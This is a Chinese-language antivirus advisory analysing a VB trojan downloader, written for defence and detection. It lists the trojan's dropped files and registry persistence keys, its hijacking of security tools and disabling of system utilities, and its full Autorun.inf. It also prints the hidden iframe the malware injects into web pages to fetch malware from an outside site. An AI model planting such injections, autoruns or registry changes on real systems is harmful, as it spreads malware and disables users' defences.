木马程序Trojan-Downloader.Win32.VB.dth
该病毒是一个使用VB编写的木马下载程序,采用NSPack加壳以躲过特征码扫描,加壳后长度59,282字节,图标为一绿色小瓢虫图标,病毒扩展名为exe,主要通过传播途径主要为移动存储,局域网传播。
病毒分析
该样本程序被激活后,将在%systemroot%\system32 生成Taskeep.vbs、netshare.cmd、Avpser.cmd、SDGames.exe文件;
通过修改注册表,在注册表HKLM的Run下新建子项Winstary,其值为“C:\WINDOWS\system32\SDGames.exe”,以达到病毒自启动的目的;
同时病毒还修改系统的win.ini文件,使得病毒能随系统启动而运行;
利用命令行将winmgmt服务类型设置成自动,并启动这个服务,用以运行Taskeep.vbs中的代码;
关闭WINDOWS 安全中心,使得病毒传播时不被防火墙拦截;
病毒运行Taskeep.vbs用以循环执行病毒自身;
运行netshare.cmd将用户A盘至Z盘在局域网中共享;并试图利用net user命令添加一个guest用户,并将此用户添加到系统管理员组中,但由于WINDOWS机制限制,此动作无法执行成功;
之后病毒运行Avpser.cmd试图结束各种杀毒软件和安全工具的进程,修改注册表映像劫持各种杀毒软件,同时修改系统时间为2030年,使得部分杀毒软件监控失效;
病毒通过修改注册表相关键值更改IE主页为“http:/ /www.zhidaobaidu.10mb.cn”,破坏系统安全模式,禁用任务管理器、禁用控制面板、禁止修改系统配置、锁定主页、禁用注册表编辑器、隐藏系统隐藏文件等,使用户在清除病毒带来重重困难。修改注册表更改计算机上的 reg 和 txt 文件关联指向“%systemroot%\system3\SDGames.exe”。
枚举所有盘符,在各个盘符下生成SDGame.exe和Autorun.inf,以及 三个url文件Recycleds.url、Windows.url,新建文件夹.url,这三个url文件都指向SDGame.exe,使用快捷方式诱惑用户运行病毒;
枚举逻辑驱动器用户计算机中的除系统盘外所有盘符中的可执行文件,使用CreateFile将文件打开后利用WriteFile将文件写入的方式覆盖感染,被感染的可执行文件图标将变成绿色小瓢虫图标,由于病毒未创建互斥体,将造成多个病毒进程同时运行,使得用户系统资源被大量占用,从而导致系统速度明显下降的现象;
同时该病毒还感染扩展名为hta、html、htm、jsp、php、asp网页文件,在这些网页文件中插入<iframe id="iframe" width="0" height="0" scrolling="no" frameborder="0" src="http://zhidaobaidu.10mb.cn/" name="Myframe" align="center" border="0">代码,使得用户打开这些网页文件时会从指定网页中下载大量病毒木马文件。
技术细节
病毒添加的注册表信息:
项:HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
键值:Winstary
指向文件:C:\WINDOWS\system32\SDGames.exe
项:HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows
键值:run
指向文件:C:\WINDOWS\system32\SDGames.exe
项:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\
CurrentVersion\Image File Execution Options\ avp.exe
项:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\
CurrentVersion\Image File Execution Options\ autoruns.exe
被映像劫持的杀毒软件包括:
avp.exe、360rpt.exe、360Safe.exe、360tray.EXE、adam.exe
AgentSvr.exe、AppSvc32.exe、avgrssvc.exe、AvMonitor.exe
CCenter.exe、ccSvcHst.exe、FileDsty.exe、FTCleanerShell.exe
HijackThis.exe、IceSword.exe、iparmo.exe、Iparmor.exe
isPwdSvc.exe、kabaload.exe、KASMain.exe、KASTask.exe
KAV32.exe、KAVDX.exe、KAVPFW.exe、KAVSetup.exe
KAVStart.exe、msconfig.exe、KWatch.exe、
病毒修改的注册表信息:
项:HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess
键值:Start
数值数据:00000002
项:HKCU\ Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
键值:SuperHidden
数值数据:2
项:HKCU \Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
键值:HideFileExt
数值数据:1
项:HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System
键值:DisableRegistryTools
数值数据:00000001
项:HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System
键值:DisableTaskMgr
数值数据:00000001
项:HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System
键值:DisableCMD
数值数据:00000000
项:HKCU\ Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
键值:NoControlPanel
数值数据:00000001
项:HKCU\ Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
键值:NoSetTas
数值数据:00000001
项:HKCU\ Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
键值:NoViewContextView
数值数据:00000001
项:HKCU\ Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
键值:NoFolderOptions
数值数据:00000001
项:HKCU\ Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
键值:NoSetTaskBar
数值数据:00000001
Autorun.inf文件内容如下:
[Autorun]
OPEN=SDGames.exe
Shell\Open=打开(^&O)
Shell\Open\Command=SDGames.exe
Shell\Explore=资源管理器(^&X)
Shell\Explore\Command=SDGames.exe
安全提示
已安装使用微点主动防御软件的用户,无须任何设置,微点主动防御将自动保护您的系统免受该病毒的入侵和破坏。无论您是否已经升级到最新版本,微点主动防御都能够有效清除该病毒。如果您没有将微点主动防御软件升级到最新版,微点主动防御软件在发现该病毒后将报警提示您“发现未知木马”,请直接选择删除处理
如果您已经将微点主动防御软件升级到最新版本,微点将报警提示您发现“Trojan-Downloader.Win32.VB.dth”,请直接选择删除。
对于未使用微点主动防御软件的用户,微点反病毒专家建议:
1、不要在不明站点下载非官方版本的软件进行安装,避免病毒通过捆绑的方式进入您的系统。
2、建议关闭U盘自动播放,具体操作步骤:开始->运行->gpedit.msc->计算机配置->管理模板->系统->在右侧找到"关闭自动播放"->双击->选择"己启用"。
3、尽快将您的杀毒软件特征库升级到最新版本进行查杀,并开启防火墙拦截网络异常访问,如依然有异常情况请注意及时与专业的安全软件厂商联系获取技术支持。
4、开启windows自动更新,及时打好漏洞补丁。
您的位置: